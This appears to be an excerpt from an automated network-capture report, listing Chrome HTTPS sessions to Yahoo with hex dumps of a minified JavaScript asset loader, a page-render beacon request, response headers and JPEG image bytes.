                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {version:"1.4.0"},modern:{min:"/aaq/wf/wf-image-1.4.0-modern.js",raw:"/aaq/wf/wf-image-1.4.0-modern.raw.js"},default:{min:"/aaq/wf/wf-image-1.4.0.js",raw:"/aaq/wf/wf-image-1.4.0.raw.js"}},"wafer-lightbox":{meta:{version:"1.10.6"},modern:{min:"/aaq/wf/wf-l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6e 61 74 69 76 65 2d 64 61 2d 31 2e 30 2e 35 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 70 72 6f 67 72 65 73 73 2d 6c 6f 61 64 65 72 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 32 2e 31 30 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: n:{min:"/aaq/wf/wf-native-da-1.0.5-modern.js",raw:"/aaq/wf/wf-native-da-1.0.5-modern.raw.js"},default:{min:"/aaq/wf/wf-native-da-1.0.5.js",raw:"/aaq/wf/wf-native-da-1.0.5.raw.js"}},"wafer-progress-loader":{meta:{version:"1.2.10"},modern:{min:"/aaq/wf/wf-p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 2e 31 32 2e 36 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 74 65 6d 70 6c 61 74 65 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 34 2e 33 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 65 6d 70 6c 61 74 65 2d 31 2e 34 2e 33 2e 72 61 77 2e 6a 73 22 7d 7d 2c 22 77 61 66 65 72 2d 74 65 78 74 22 3a 7b 6d 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .12.6.raw.js"}},"wafer-template":{meta:{version:"1.4.3"},modern:{min:"/aaq/wf/wf-template-1.4.3-modern.js",raw:"/aaq/wf/wf-template-1.4.3-modern.raw.js"},default:{min:"/aaq/wf/wf-template-1.4.3.js",raw:"/aaq/wf/wf-template-1.4.3.raw.js"}},"wafer-text":{me
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 6f 22 3a 7b 6d 65 74 61 3a 7b 76 65 72 73 69 6f 6e 3a 22 33 2e 32 2e 32 22 7d 2c 6d 6f 64 65 72 6e 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2d 6d 6f 64 65 72 6e 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2d 6d 6f 64 65 72 6e 2e 72 61 77 2e 6a 73 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6d 69 6e 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2e 6a 73 22 2c 72 61 77 3a 22 2f 61 61 71 2f 77 66 2f 77 66 2d 76 69 64 65 6f 2d 33 2e 32 2e 32 2e 72 61 77 2e 6a 73 22 7d 7d 7d 7d 2c 22 2e 2f 73 72 63 2f 65 6e 74 72 79 2e 6a 73 22 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: o":{meta:{version:"3.2.2"},modern:{min:"/aaq/wf/wf-video-3.2.2-modern.js",raw:"/aaq/wf/wf-video-3.2.2-modern.raw.js"},default:{min:"/aaq/wf/wf-video-3.2.2.js",raw:"/aaq/wf/wf-video-3.2.2.raw.js"}}}},"./src/entry.js":function(a,e,r){"use strict";function w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 65 72 6e 3a 21 30 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 69 7d 2c 72 6f 6f 74 3a 73 7d 2c 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 6c 6f 61 64 57 61 66 65 72 73 46 6f 72 57 72 61 70 70 65 72 45 6c 65 6d 28 64 6f 63 75 6d 65 6e 74 29 7d 2c 30 29 7d 29 2c 74 68 69 73 2e 73 79 6e 63 28 29 7d 72 65 74 75 72 6e 20 66 28 61 2c 5b 7b 6b 65 79 3a 22 6c 6f 61 64 57 61 66 65 72 73 46 6f 72 57 72 61 70 70 65 72 45 6c 65 6d 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 72 3d 5b 5d 3b 6a 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 77 29 7b 76 61 72 20 66 3d 6c 5b 77 5d 7c 7c 77 2c 6f 3d 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ern:!0,successClass:i},root:s},window.wafer.ready(function(){setTimeout(function(){e.loadWafersForWrapperElem(document)},0)}),this.sync()}return f(a,[{key:"loadWafersForWrapperElem",value:function(a){var e=this,r=[];j.forEach(function(w){var f=l[w]||w,o=w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC201INData Raw: 65 74 28 6c 29 29 72 65 74 75 72 6e 20 76 6f 69 64 20 6f 28 29 3b 65 5b 72 5d 3d 21 30 2c 6e 2e 5f 61 73 73 65 74 4c 6f 61 64 65 64 4d 61 70 70 69 6e 67 2e 73 65 74 28 6c 2c 21 30 29 2c 69 28 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 22 2b 6c 7d 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 65 5b 72 5d 3d 21 31 2c 61 29 72 65 74 75 72 6e 20 76 6f 69 64 20 73 28 61 29 3b 6f 28 29 7d 29 7d 29 7d 29 29 7d 7d 5d 29 2c 61 7d 28 29 2c 70 3d 71 3b 65 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 70 28 7b 73 65 6c 65 63 74 6f 72 3a 22 2e 77 61 66 65 72 22 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: et(l))return void o();e[r]=!0,n._assetLoadedMapping.set(l,!0),i({src:"https://s.yimg.com"+l},function(a){if(e[r]=!1,a)return void s(a);o()})})}))}}]),a}(),p=q;e.default=new p({selector:".wafer"})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              48192.168.2.45106987.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1067OUTGET /info/p.gif?apptype=default&beaconType=pageRenderEnd&code=pageRender&bucket=rocket_GA_desk_test-3-v1%2Cseamless&device=desktop&intl=us&rid=1fkbtbdjgb12s&site=fp&t=1728414813103 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC589INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-security-policy-report-only: default-src 'self'; report-uri https://csp.yahoo.com/beacon/csp?src=fendr_beaconeater.media.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC787INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              49192.168.2.45107287.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC530OUTGET /uu/api/res/1.2/LPQ_1T.gtbBgAzFw21rhGw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/aaa8fe20-85a3-11ef-b77d-220fee758bf5.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1055INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="aaa8fe20-85a3-11ef-b77d-220fee758bf5.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "9e530ae30640705b50966a2a28855386"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 18:32:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 18:55:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=2;cpu=1;start=2024-10-08T18:55:02.412Z;desc=hit,rtt;dur=86,content-info;desc="width=356,height=180,bytes=8060,owidth=5000,oheight=2815,obytes=757739,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-request-id: ee7f2e5062325b422f18be161ffb54bc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 1113
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_id: ee7f2e5062325b422f18be161ffb54bc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 21130
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 00 b4 01 64 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 08 01 00 09 ff c4 00 52 10 00 01 03 03 02 03 05 06 02 05 07 06 0b 09 00 00 01 02 03 04 00 05 11 06 12 07 21 31 13 22 41 51 61 08 14 32 71 81 a1 15 91 23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: JFIFCCdR!1"AQa2q#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 59 32 eb 5a b5 2d 85 76 8d 3f 75 8c f0 92 86 db ec d2 3a ac 75 a7 95 c2 6b 62 c4 2d b0 89 37 e1 5d bb 1d b4 84 80 46 0e 05 55 95 46 de 4b 0a 81 32 d3 9a 6a df 73 61 b0 9c a0 a1 40 ab 23 a8 f2 ac eb 9b 87 d8 9e 9d 0c 16 3c 0b 44 7b 7b 61 31 81 42 bf 68 78 56 7c a6 e4 5d 84 79 11 23 89 72 6d 0d a1 0e 2f 72 80 c1 35 1b 0e 2c 5a dc f4 38 01 4f 3a 8d ac 93 21 63 52 bb a7 bb d3 d6 80 76 01 fd aa 68 80 39 d1 c4 8d b1 86 41 09 56 d0 9e 54 79 d8 4a 38 21 ba d9 b4 76 00 6d eb 93 9a b5 41 bc 95 ab 76 2b a9 2d e5 05 5f 4a d6 8e 0a 2c ad 35 04 57 58 b9 38 15 d3 a8 ad 1b 75 93 26 e5 bc 80 b7 cb d9 fa 27 95 d7 a1 a9 9c 70 34 58 f5 02 e0 c9 7c 0c fd ea 09 93 40 9a 5b e5 32 cc 7d fb b3 ca a9 d4 dc b9 4f 61 64 49 89 75 5d de 95 51 a5 92 d2 39 71 d4 76 5b 38 ed 2e b7 58 b0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Y2Z-v?u:ukb-7]FUFK2jsa@#<D{{a1BhxV|]y#rm/r5,Z8O:!cRvh9AVTyJ8!vmAv+-_J,5WX8u&'p4X|@[2}OadIu]Q9qv[8.X
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 16 a1 d7 d1 f0 3c b4 67 a8 49 c0 a2 e7 72 46 f4 34 fa 30 ed 15 fb 23 80 62 a1 df 24 f1 a5 08 6c 92 3a 10 55 83 8a 27 b9 3a 49 0e 16 8b 1d eb 50 4e 45 ba c3 6a 93 70 96 e7 c2 c4 76 ca d6 7e 40 73 a0 a9 38 d3 59 93 c1 52 fb 50 b5 d3 e3 d6 b8 92 58 fa 93 a7 fd 9c b8 c9 1e ce bb f3 9a 32 43 b1 1a 1b 9c 31 5d 6e 42 db 1e 6a 43 6a 2a 4f ae 47 2a a7 6b aa 50 ba 7c b4 64 72 af 8e 74 2b 8a fe 5d d6 c4 bb 76 2b e9 56 e9 30 9d 2c ca 6c a1 69 24 14 91 83 91 5a 49 e4 eb 69 4e 35 23 cd 07 94 12 13 4f 92 5e e8 f6 df 5a 60 59 ec 1a 43 01 55 21 03 90 ad d6 86 92 07 f5 77 24 13 fd e6 5c 1f ec d6 8e 9b 2c 5c c4 f2 3f 17 20 e7 a0 d5 7f 91 f4 9f d9 15 e6 e4 70 5f b8 ac ec b9 c8 49 fc 90 af f6 be f5 d9 56 78 9a 3e 35 a6 b3 92 71 ab 44 d8 70 fd e6 d6 d8 0b de 37 0f 4a b5 6f f1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <gIrF40#b$l:U':IPNEjpv~@s8YRPX2C1]nBjCj*OG*kP|drt+]v+V0,li$ZIiN5#O^Z`YCU!w$\,\? p_IVx>5qDp7Jo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: 72 71 27 2a 39 06 97 29 2a b8 6c 4f 25 f2 b5 e5 47 e4 29 f9 32 06 72 37 a9 f0 b3 92 31 56 31 b0 0e 59 0a 5a f3 40 80 ce f8 0a 51 39 a3 41 7a 01 23 34 e0 77 61 7b 7d 69 0c 6b 75 8c 36 7f cd ae 17 18 3a e1 8e 5a 3f 4a 70 71 53 42 78 1a 4b 23 25 d2 c0 2e 39 21 6a 41 c7 81 a9 63 57 04 72 88 dc d6 96 09 47 67 21 60 a8 74 58 14 7d 7c 82 a2 3d 43 b6 b7 1d bc 23 99 1e 3e 74 d2 97 30 92 c0 a1 68 c0 1c b3 50 86 98 04 3c 5b c8 db 9f ad 3b 43 e4 50 d4 c0 95 77 93 80 7d 68 70 12 96 0e b9 29 af 33 41 80 b9 96 00 b7 35 c1 f1 af 18 f4 cd 3a 88 d9 42 83 70 4f ea ac 8f a5 36 07 52 48 2f f1 05 78 38 7f 2a 58 13 92 62 79 4e a9 e4 14 15 1e 74 e9 00 de c6 1e f6 eb 98 98 cf e9 8b 3b 2a 3d f5 4b 94 be 7e 5d 9a 52 7f 32 aa 7a bd 85 49 7b 99 82 d4 ef 65 6c bf cb 4a 7b ec 5b 7b bc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: rq'*9)*lO%G)2r71V1YZ@Q9Az#4wa{}iku6:Z?JpqSBxK#%.9!jAcWrGg!`tX}|=C#>t0hP<[;CPw}hp)3A5:BpO6RH/x8*XbyNt;*=K~]R2zI{elJ{[{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: ff 00 38 24 f3 2d 24 e1 a4 1f 42 72 af 9a 05 71 1c 11 62 ef 6e aa 5f dc fe 87 11 e1 6e 93 d6 b8 9e a3 3d f1 db f5 ee 63 f2 ca c7 51 8a f5 4d 8f 77 7f 12 c1 6f 7b 21 6a d9 1a 23 88 73 50 d9 25 0d b8 d5 cd 84 25 58 38 4a b0 e2 07 cd 2a 22 b0 b5 e5 89 d3 ae bf 09 f3 9f 89 ba 37 2d cb 92 2f 2f e5 00 e1 c4 66 35 05 a3 89 d6 a6 12 58 bc b6 88 b2 1c 40 f8 96 91 94 28 fa 94 93 93 fd 9a de 8c d3 84 a5 47 d9 16 7c 22 d7 5c 28 54 b1 ae fe 4e df ee 59 5e cf da 4a 3e 87 e1 bc 45 3c c8 42 8c 70 fb ce 67 99 59 49 5b b9 f9 0d a3 3f d9 af 1b e2 9d 4d de 5d a8 2f 73 94 e2 9d 4d ea fa d4 a4 bd d2 30 9e bd be ab 56 6b 0b b5 f9 45 47 df 65 ba ff 00 78 e4 f7 94 48 1f 96 2b d4 34 6b 55 6d 6b 0a 4f d8 fa 4f 42 b4 56 7a 6d 2a 2b d8 8f 29 8c 0e 95 a8 fb 9a cd 65 13 9f 67 fb 9b d6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 8$-$Brqbn_n=cQMwo{!j#sP%%X8J*"7-//f5X@(G|"\(TNY^J>E<BpgYI[?M]/sM0VkEGexH+4kUmkOOBVzm*+)eg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC397INData Raw: 1f 09 fa 52 18 29 7d 68 99 18 4a a9 84 17 48 47 a9 08 f5 21 1e a4 23 d4 84 5d 6d 48 52 3e 13 d4 57 1b 83 a8 6c 54 dc b7 08 c6 ea 7e 5f 50 5b 07 ef 6e 7e d5 13 80 fc c7 3f 11 23 e2 5e 28 30 2e 60 0f 4f 4a 92 3b c4 d3 a8 e4 76 c6 f5 bd 9e 74 7c 80 e4 2b b7 14 cd 60 20 1d b8 f5 a6 48 47 7b 6f 9d 21 02 2e 90 68 58 81 87 bd 29 84 75 2f 01 cc d2 10 25 4a e9 d6 85 ad 83 4f 27 cc 3e 31 5c 8d eb 8a ba b2 e6 16 4a 1e bb ca 08 57 9a 12 ea 82 7f 74 26 aa cb b9 6a 05 6b c4 db bd c6 d9 6f d3 36 e8 0f 76 4f 3e dc 89 0b 1b 42 b7 6e 77 60 3c c6 3a 35 f7 a0 c7 b1 2a 45 9b a0 ae 33 ee 57 3b 85 f6 eb 28 cb 99 23 6b b2 9e 5a 42 54 f3 ee 15 29 6a 56 06 32 4f 90 c7 3a e6 35 e7 96 91 f4 ef 82 f6 5f db d5 ac be 84 ba 4c a2 76 a8 8e b9 f1 e9 58 4a 27 bb 24 21 90 f1 e5 cb af ad 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: R)}hJHG!#]mHR>WlT~_P[n~?#^(0.`OJ;vt|+` HG{o!.hX)u/%JO'>1\JWt&jko6vO>Bnw`<:5*E3W;(#kZBT)jV2O:5_LvXJ'$!.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC1300INData Raw: e4 03 89 a5 5b 1d 39 67 d8 e6 78 c2 d1 5c e9 13 fc 8f a4 5c 37 bb 19 3c 2c bc 59 f7 6e 75 c9 8c b6 d8 cf 40 ea 9a 03 f8 2a bc 7e fa e7 36 b5 22 bd ff 00 c9 f2 24 e2 fc cb fc c8 a7 b5 d5 f0 db 78 48 9b 7a 07 7e 7d c1 96 7a fe aa 42 97 fc 52 2a 6e 12 8e 6f 72 d7 cb fe 4f 4c f0 f2 cd dc ea ca b7 fe a6 1d 43 4e 39 fd 5a 73 8a f5 98 b3 e9 27 b2 48 0b d0 64 a8 8e e6 28 a3 2d c0 94 d6 33 91 b6 e9 06 53 30 9d 7d 28 ef 36 37 a4 f9 29 3d e1 fc 29 e4 b9 e2 d2 f5 32 35 97 0b ad 3e a5 26 fd 0b d3 41 fb 71 48 e1 ed fb b2 d3 1a 42 6d e4 4f 0d b0 fb 4b 8d 9e dd 60 e1 25 1d e1 b4 85 2b 91 e7 d7 a0 ae 7e cb 47 be b6 93 92 78 47 cb 15 f8 7e a5 d4 e5 b7 ab f5 40 78 c3 a6 75 9f 13 b8 96 d5 f2 2f 0e ae 36 1b 86 a3 8e 9b 83 b6 c7 9c 43 aa 6c ab ba a7 37 a7 96 cc a7 39 56 31 cf
